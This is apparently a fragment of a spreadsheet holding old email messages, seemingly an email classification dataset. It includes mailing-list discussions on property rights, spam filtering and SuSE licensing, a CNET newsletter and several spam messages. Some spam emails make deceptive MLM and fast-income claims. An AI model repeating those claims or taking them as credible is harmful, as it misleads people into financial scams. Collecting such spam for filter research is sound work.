 &gt; they didn't have too much trouble with
 &gt; their titles.
 Pg 177:
 In another country, a local newspaper, intrigued by our evidence of
 extralegal real estate holdings, checked to see if the head of state's
 official residence had a recorded title.  It did not.
 Pg 92:
 The value of land in the formal sector of Lima averages US$50 per square
 meter, whereas in the area of Gamarra, where a great deal of Peru's
 informal manufacturing sector resides, the value per square meter can go
 as high as US$3,000.
 ==========
 I'd have made the same assumption you did.  De Soto says that isn't
 correct.  You can find mansions that don't have title.  A lot of them,
 in fact.  But they can't be used for collateral for a loan, or otherwise
 participate as 'capital' because of their extra-legal status.
 &gt; &gt; Mr. Long, I think you'd particularly enjoy the De Soto work.
 &gt; 
 &gt; On the "to find" list.  Any chance of
 &gt; an explanation of that "Bell Jar" in
 &gt; the meantime?
 French historian Fernand Braudel (so Braudel's Bell Jar, not De Soto's)
 ==&gt;
 The key problem is to find out why that sector of society of the past,
 which I would not hesitate to call capitalist, should have lived as if
 in a bell jar, cut off from the rest; why was it not able to expand and
 conquer the whole of society? ... [Why was it that] a significant rate
 of capital formation was possible only in certain sectors and not in the
 whole market economy of the time? ... It would perhaps be teasingly
 paradoxial to say that whatever was in short supply, money certainly was
 not ... so this was an age where poor land was bought up and magnificent
 country residents built ... [How do we] resolve the contradiction ...
 between the depressed economic climate and the splendors of Florence
 under Lorenzo the Magnificent?
 --------------
 De Soto's theory is that the Bell Jar is formed when you segregate those
 who have *practical* access to legal property rights and those who do
 not.  The poor[1] have property -- lots and lots of property.  What they
 don't have is access to the systems where we turn property into capital
 and allow it to start growing.  Their property can only be exchanged
 with a small section of people who know them personally.
 [1] Actual poor people, not 'poor' Americans with a living standard that
 is the envy of most of the world.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: TrackBack for OSXCON
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85511996
 Date: Not supplied
 Mena sez: "We've set up a TrackBack ping repository for attendees of O'Reilly's 
 Mac OS X Conference. If you're using Movable Type or a TrackBack-enabled tool, 
 you can ping the category relating to your OSXCon-specific weblog post." Link
 [1] Discuss[2] (_Thanks, Mena[3]!_)
 [1] http://www.movabletype.org/osxcon/
 [2] http://www.quicktopic.com/boing/H/Eg8fKLFxsFr
 [3] http://www.dollarshort.org/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: LET'S STOP THE MLM INSANITY!
</t>
  </si>
  <si>
    <t xml:space="preserve">Still believe you can earn $100,000 FAST IN MLM? GET REAL!
 GET EMM, A brand new SYSTEM that replaces MLM with something that WORKS! 
 Start Earning 1,000's Now! Up to $10,000 per week doing simple online tasks.
 Free Info-  breakfree@luxmail.com - Type "Send EMM Info" in the subject box.
 This message is sent in compliance of the proposed bill SECTION 301. per section 301, Paragraph (a)(2)(C) of S.1618. Further transmission to you by the sender of this e-mail may be stopped at no cost to you by sending a reply to : "email address" with the word Remove in the subject line.  
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 At 11:12 PM +0200 on 8/18/02, Robert Harley wrote:
 &gt; PS: Funny how the New World world population supposedly had no
 &gt; immunity
 &gt;     to Old World diseases and died like flies, but the Old World
 &gt;     population was completely unaffected by New World diseases
 &gt; (other
 &gt;     than tabacco and syphilis...)  Bullshit meter red-lining
 &gt; again...
 See Jared Diamond's excellent "Guns, Germs, and Steel" for the story.
 Eurasians had outrageously huge, dense, populations to incubate and
 immunize whole classes of fatal diseases in, and unobstructed
 east-west trans-supercontinental disease transport vectors (horses,
 the silk road, sailing ships) to spread them around with.
 Game over, man. Same thing with war, technology, crops, domestic
 animals and everything else worth having in life. :-).
 Remember Joel Mokyr's definition of progress from "The Lever of
 Riches": Progress is more stuff cheaper.
 Cheers,
 RAH
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPWAtT8PxH8jf3ohaEQJ3yACghH1+45PZkGdiocf4RQFpO/fQdNUAoJ/n
 tIULaBVQjo/YWd4FlHA5sSRn
 =4WRa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</si>
  <si>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[Guido, on the classifier pickle on SF]
 &gt; I downloaded and played with it a bit, but had no time to do anything
 &gt; systematic.
 Cool!
 &gt; It correctly recognized a spam that slipped through SA.
 Ditto.
 &gt; But it also identified as spam everything in my inbox that had any
 &gt; MIME structure or HTML parts, and several messages in my saved 'zope
 &gt; geeks' list that happened to be using MIME and/or HTML.
 Do you know why?  The strangest implied claim there is that it hates MIME
 independent of HTML.  For example, the spamprob of 'content-type:text/plain'
 in that pickle is under 0.21.  'content-type:multipart/alternative' gets
 0.93, but that's not a killer clue, and one bit of good content will more
 than cancel it out.
 WRT hating HTML, possibilities include:
 1. It really had to do with something other than MIME/HTML.
 2. These are pure HTML (not multipart/alternative with a text/plain part),
    so that the tags aren't getting stripped.  The pickled classifier
    despises all hints of HTML due to its c.l.py heritage.
 3. These are multipart/alternative with a text/plain part, but the
    latter doesn't contain the same text as the text/html part (for
    example, as Anthony reported, perhaps the text/plain part just
    says something like "This is an HMTL message.").
 If it's #2, it would be easy to add an optional bool argument to tokenize()
 meaning "even if it is pure HTML, strip the tags anyway".  In fact, I'd like
 to do that and default it to True.  The extreme hatred of HTML on tech lists
 strikes me as, umm, extreme &lt;wink&gt;.
 &gt; So I guess I'll have to retrain it (yes, you told me so :-).
 That would be a different experiment.  I'm certainly curious to see whether
 Jeremy's much-worse-than-mine error rates are typical or aberrant.
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting wintermute (cout@eircom.net):
 &gt; No, as of oh, about a year to a year and a half ago
 &gt; SuSE revoked it's free offering of it's retail distro.
 &gt; Sometime about the start of the great slump, SuSE pulled
 &gt; free release of it's main x86 product.
 &gt; 
 &gt; So the last free version of SuSE you could get via a Linux Format 
 &gt; par example was 7.0 I think.
 Let's limit the discussion to x86, to simplify.  There are some
 additional complications for some of the other architectures.
 (Essentially, they make most of the other architectures' ISO images
 available gratis, because they aren't selling boxed sets and want the
 public to have them anyway.  The ISOs include third-party proprietary
 apps, but of necessity not the highly-restricted ones available in 
 boxed set editions.)
 (1) You can get a single-disk ISO9660 image of SuSE "evaluation"
 edition, version 7.0, _lots_ of places, including here:
 ftp://ftp.suse.com/pub/suse/i386/evaluation-7.0/evaluation-7.0.iso
 (2) You could "wget -r" (or equivalent) the entire 8.0 FTP Edition (for
 lack of an official name for it) from here (or mirror sites):
 ftp://ftp.suse.com/pub/suse/i386/8.0/
 Please note the restricted rights granted for use of the SuSE-originated
 YaST program specifically, stated here:
 ftp://ftp.suse.com/pub/suse/i386/8.0/COPYRIGHT.yast
 A grant of limited redistribution rights to the distribution as a whole 
 (apparently covering the FTP Edition and the Evaluation Edition) is
 stated here: ftp://ftp.suse.com/pub/README.mirror-policy   Quoting:
      please make sure that you meet the following conditions if
      you intend to mirror ftp.suse.com:
    - SuSE Linux (YaST in particular) may not be reproduced on
      CDs or other media FOR VALUE. Reproduction for personal
      or educational use is explicitly allowed and encouraged.
 &gt; I'm not sure on the details of it, but I think SuSE have
 &gt; probably done an OpenBSD of the cd they sell?
 OpenBSD Foundation assert a compilation copyright over the OpenBSD
 official ISO9660 image.  A compilation copyright is the copyright
 monopoly that, for example, the editor of a set of third-party short
 stories receives.  Even though he didn't write any of the constituent
 stories, he put creative work into selecting, arranging, and editing
 those stories.  The law recognises such efforts as creative works
 deserving copyright protection, if there is sufficient creative effort.
 (A judge would decide, if someone made a court case of it.)  Courts have
 held, on the other hand, that arrangement and publication of
 alphabetical telephone listings in a "yellow pages" telephone directory
 (the advertising section) don't have anywhere near enough creative
 content to support an overreaching telco's claim of compilation
 copyright.  (The court politely said "Nice try", in effect.)
 The OpenBSD Foundation's claim may be a bit of a legal bluff, too.
 Theoretically, one could get around it by creating a slightly different
 set of ISO9660 images, thereby finessing the claim of compilation
 copyright.  But nobody bothers, because OpenBSD Foundation actually 
 charges only a very reasonable price for jewel-case sets, and nobody
 wants to endure the barrage of hatemail from Theo &amp; co.
 I've never seen any claim from SuSE of compilation copyright on its ISOs
 or distribution as a whole.
 &gt; I could be wrong, I don't use SuSE so haven't investigated,
 &gt; but essentially the only 'free' version of SuSE will be it's
 &gt; ftp offering.
 Again, the "FTP Edition" and the Evaluation Edition may be redistributed
 more-or-less freely, as long as it's not "for value".  (Ditto the
 "live-eval" edition, which is a demo only.)  The three boxed sets'
 contents may not.
 -- 
 Cheers,              A good man has few enemies; a ruthless man has none.
 Rick Moen                                       
 rick@linuxmafia.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ashfield Online 9/1/2002 by Aric McKeown
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;title&gt;Ashfield Online email subscription (Sunday, September 1, 2002)&lt;/title&gt;&lt;/head&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;b&gt;Ashfield Online &amp;copy; 2002 Aric McKeown&lt;/b&gt; Comic for Sunday, September 1, 2002&lt;br&gt;
 &lt;br&gt;
 &lt;object id="20020901"
 name="20020901"
 classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
 codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=3,0,0,0"
 align="top" border="0" width="350" height="414"&gt;&lt;param
 name="movie" value="http://www.AshfieldOnline.com/comics/ash20020901.swf"&gt;&lt;param name="quality"
 value="autohigh"&gt;&lt;param name="salign" value="T"&gt;&lt;param
 name="bgcolor" value="#FFFFFF"&gt;&lt;embed src="http://www.AshfieldOnline.com/comics/ash20020901.swf" align="top" border="0" width="350" height="414" swliveconnect="FALSE" quality="autohigh" salign="T" bgcolor="#FFFFFF" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"&gt;&lt;/object&gt;&lt;br&gt;
 &lt;font size="2"&gt;Powered by &lt;/font&gt;&lt;a href="http://www.shockwave.com"&gt;&lt;font
 size="2"&gt;FLASH&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 (A &lt;a href="http://www.keenspot.com/"&gt;Keenspot&lt;/a&gt; Comic)&lt;br&gt;
 &lt;br&gt;Visit the Ashfield Online website at &lt;a href="http://www.AshfieldOnline.com/"&gt;www.AshfieldOnline.com&lt;/a&gt;.
 &lt;hr&gt;&lt;br&gt;
 &lt;a href="http://www.burstnet.com/ads/ad8223a-map.cgi/ns" target="_top"&gt;&lt;img src="http://www.burstnet.com/cgi-bin/ads/ad8223a.cgi/ns" width="468" height="60" border="0" alt="Click Here"&gt;&lt;/a&gt;
     &lt;br&gt;
 &lt;hr&gt;&lt;br&gt;
 &lt;/center&gt;
 &lt;br&gt;
 &lt;b&gt;Note:&lt;/b&gt; If you do not see a comic in this email and you read your email
 offline, you may need to connect online to load the images.  You must also
 be able to read HTML-encoded email.
 &lt;br&gt;&lt;br&gt;
 If mail sent to your account is returned as undeliverable two or more times,
 your email address may be removed from this list.  This may occur if you go
 over your mail provider's quota or for various other reasons.
 &lt;br&gt;&lt;br&gt;
 Do not reply to this email.  This is an automated mailing list and replies
 are not read.  Direct comments and inquiries to the author of this comic
 or to &lt;a href="mailto:help@keenspot.com"&gt;help@keenspot.com&lt;/a&gt;.
 Please be sure to indicate the comic to which you are referring.
 &lt;br&gt;&lt;br&gt;
 To unsubscribe from this list, go to &lt;a href="http://www.keenspot.com/unsubscribe.html"&gt;http://www.keenspot.com/unsubscribe.html&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
 To subscribe to a new list or to resubscribe to this list if you are unsubscribed, go to &lt;a href="http://www.keenspot.com/subscribe.html"&gt;http://www.keenspot.com/subscribe.html&lt;/a&gt;&lt;br&gt;
 &lt;!--
 X-Keenlist-Info: ashfield-daily, 
 //--&gt;
 &lt;br&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bosnia goes it alone for first full poll
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572781,215/
 Date: 2002-10-05T03:05:36+01:00
 *World latest:* Hardliners battle for control of divided parliaments and 
 presidency.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Try It Free Before You  Buy!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi !
 My name is Wayne Harrison and I would like to share a
 genuine, NO RISK opportunity with you.
 What I have to share with you is not like any other internet
 opportunities you have seen before. It is first and foremost
 a CONSUMER OPPORTUNITY.
 It also offers you the ability to have a share of a
 new Internet Mall to buy at wholesale for yourself
 or to send others and make commissions on their
 purchases.
 Besides this, it also offers a unique networking program
 using a principle we call "REFERNET" Marketing. This is no
 "get rich quick" scheme, but rather a credible
 and realistic way to save money and gradually develop
 what can become a large, recurring residual income.
 What's the best thing about this opportunity?
 You can "try it before you buy it". That's right.
 You can join the DHS Club for FREE with no risk
 or obligation. 
 Make sure and check out the DHS Club's own ISP, ClubDepot.com.
 You'll get Unlimited Internet Access for only $14.95 / month! Included
 are 5 email addresses and 5 MB web space.
 To get your free membership and to learn more about
 the DHS Club and our exciting REFERNET Marketing
 Program and Postlaunch, visit my web page at
 http://letscreatebiz/whjoinfree  
 Remember, you have nothing to lose and potentially a lot to gain!
 Best Regards,
 Wayne Harrison
 To be removed from future mailings, simply
 respond with REMOVE in the subject line.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: An Engineer's View of Venture Capitalists
</t>
  </si>
  <si>
    <t xml:space="preserve">"Adam L. Beberg" &lt;beberg@mithral.com&gt; writes:
 &gt; &gt; Interestingly, it was the VC that convinced Zope Corp. to go opensource.
 &gt; 
 &gt; But wasnt that before they realized that Open Source(TM) ment they couldnt
 &gt; control it?
 If you're going to assume that they were stupid, why not assume that
 they still are stupid, and never did realize it?
 -- 
 Karl Anderson      kra@monkey.org           http://www.monkey.org/~kra/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: STOP THE MLM INSANITY!
</t>
  </si>
  <si>
    <t xml:space="preserve">You are receiving this email because you have expressed an interest in receiving information about online business opportunities. If this is erroneous then please accept my most sincere apology. If you wish to be removed from this list then simply reply to this message and put "remove" in the subject line - Thank you.
 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 Greetings! 
 You are receiving this letter because you have expressed an interest in receiving information about online business opportunities. If this is erroneous then please accept my most sincere apology. This is a one-time mailing, so no removal is necessary. 
 If you've been burned, betrayed, and back-stabbed by multi-level marketing, MLM, then please read this letter. It could be the most important one that has ever landed in your Inbox. 
 MULTI-LEVEL MARKETING IS A HUGE MISTAKE FOR MOST PEOPLE 
 MLM has failed to deliver on its promises for the past 50 years. The pursuit of the "MLM Dream" has cost hundreds of thousands of people their friends, their fortunes and their sacred honor. The fact is that MLM is fatally flawed, meaning that it CANNOT work for most people. 
 The companies and the few who earn the big money in MLM are NOT going to tell you the real story. FINALLY, there is someone who has the courage to cut through the hype and lies and tell the TRUTH about MLM. 
 HERE'S GOOD NEWS 
 There IS an alternative to MLM that WORKS, and works BIG! If you haven't yet abandoned your dreams, then you need to see this. Earning the kind of income you've dreamed about is easier than you think! 
 With your permission, I'd like to send you a brief letter that will tell you WHY MLM doesn't work for most people and will then introduce you to something so new and refreshing that you'll wonder why you haven't heard of this before. 
 I promise that there will be NO unwanted follow up, NO sales pitch, no one will call you, and your email address will only be used to send you the information. Period. 
 To receive this free, life-changing information, simply click Reply, type "Send Info" in the Subject box and hit Send. I'll get the information to you within 24 hours. Just look for the words MLM WALL OF SHAME in your Inbox. 
 Cordially, 
 Majee
 P.S. Someone recently sent the letter to me and it has been the most eye-opening, financially beneficial information I have ever received. I honestly believe that you will feel the same way once you've read it. And it's FREE! 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.COM: File-traders in the crosshairs
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;File-traders in the crosshairs&lt;/title&gt;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&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XW8S97AuhssDLfzpHOCerR" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N1090.cnet/B926801.16;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=28-A2wXIRd4w3YU_u4EL2t1VlTK8yiR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4YXtdakcvwlGWUTnaNtPR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtdRNUUC9MWz8AtIQwjjnR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDqn6Owp9WhKPAKa1CPIuR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPzEEgN5RUywq2NRJSBTZR"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15, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 File-traders in the crosshairs&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Will IBM's new "Shark" sink or swim?&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 HP exits e-business software market&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Security's the message for Exchange&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Hack attacks on Linux on the rise&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft tries to steal Macworld thunder&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Perspectives&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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&lt;b&gt;Send in the geeks&lt;/b&gt;&lt;br&gt;
 Declan McCullagh tells of technophiles who become political activists.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzT5Io2Hw5zeFOPq1FsnynR" &gt;Read Full Story&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;File-traders in the crosshairs&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 When the recording industry last month let slip plans to sue individuals who trade copyrighted songs on file-swapping services, Web surfers everywhere pulled down their MP3 collections in a frenzy of fear.
 OK, not really. Despite the music industry's hopes, such threats have so far been met with a collective yawn in the file-swapping community, which has yet to see much damage in spite of repeated legal wrangling with the Recording Industry Association of America.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 10:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BwVDVRvA5LF5vLk7KCgFeR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Will IBM's new "Shark" sink or swim?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 IBM announced a new top-end "Shark" storage system Monday that could boost the company's prospects against entrenched competitors in the depressed storage market.
 Three years ago, IBM introduced its first Enterprise Storage System product, code-named Shark, in an attempt to rebuild a market it had almost totally ceded to rivals EMC and Hitachi Data Systems.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 7:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BdHno8kFhmobF8XEDxwcyR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;HP exits e-business software market&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Hewlett-Packard on Monday discontinued its family of e-business software after failing to make a splash in the multibillion-dollar market.
 After a two-year effort, HP decided to discontinue its NetAction product line, which included application-server software designed for Web transactions, and related software for building Web services, technology that allows companies to interact and conduct business via the Internet.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 10:55 AM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpErJCShbd-10-kl0aSxkZlR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Security's the message for Exchange&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft is hatching plans for a new Exchange Server e-mail system, with improved security, a facelift for Outlook, and better support for cell phones and other handhelds.
 Microsoft chief executive Steve Ballmer is expected to elaborate on the new version of Exchange in a speech to business partners Monday at its Fusion conference in Los Angeles.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 11:30 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXo3Yz7KMVqS8CMB0qvseR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Hack attacks on Linux on the rise&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Hackers are increasingly targeting Web servers based on the Linux operating system, while the number of successful attacks on Windows systems decreases, according to a new report from a U.K. systems integrator.
 The study by Mi2g also found that successful attacks on U.K. and U.S. government sites have decreased, which may be due to tougher laws and improved security.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 11:20 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwFSurEGpsa9-0t3VVat9yR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Microsoft tries to steal Macworld thunder&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft on Monday launched the first of several pre-emptive strikes against Apple Computer's Macworld trade show by making announcements about new technologies far ahead of their delivery to market.
 The strategic attack comes as tensions mount between Apple and Microsoft. During Macworld five years ago, the two companies announced a five-year technology agreement, whereby Microsoft committed to continued development of Office and Internet Explorer for the Mac.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002, 8:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4ELnoUpNX3VynhNBuCqlR"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&lt;b&gt;Chewing the sashimi with Jeff Bezos&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 "We're still at the very beginning," says Amazon.com's founder in a wide-ranging interview over lunch. "There's so much more to come."
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHoldEOYPBBBkqU8niQ74R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;The earnings season of discontent &lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Second-quarter announcements are likely to meet with deep investor skepticism, despite an outlook that is slowly improving.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 15, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdHnvNMWEdFPcZsjpRp-LrR"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href="http://clickthru.online.com/Click?q=50-M_CBIR0XgZwYFl_ASOnO8CtmMgRR"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href="http://clickthru.online.com/Click?q=65-K82zIDPtIgFX7DVD70VOf0m8P9ZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7a-EE_AIPBjUrYolSJhU6coezkBZXdR"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href="http://clickthru.online.com/Click?q=8f-OOYvQ8KKwWMbqoWXvsg9tyQFWveR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=a4-HGTsQ6pafTXawrG463LvvI2rgYyR"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href="http://clickthru.online.com/Click?q=ba-m-45QXpKAWArNk0xhOmI_uIUEknR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw2HwvMITMJaylIO7r3fxeR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkWGjHi9LbI81u0PT_Qv1yR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOWPQR2uKqSM_svdGheo-lR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQzHxrW4Nx4r8dJx98lbK4R" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=23-sFcGINM8KMn2JOQiAv2Y9ZZvQKrR"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src="http://news.cnet.com/i/ne/bb/2002/07/0715_apple.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
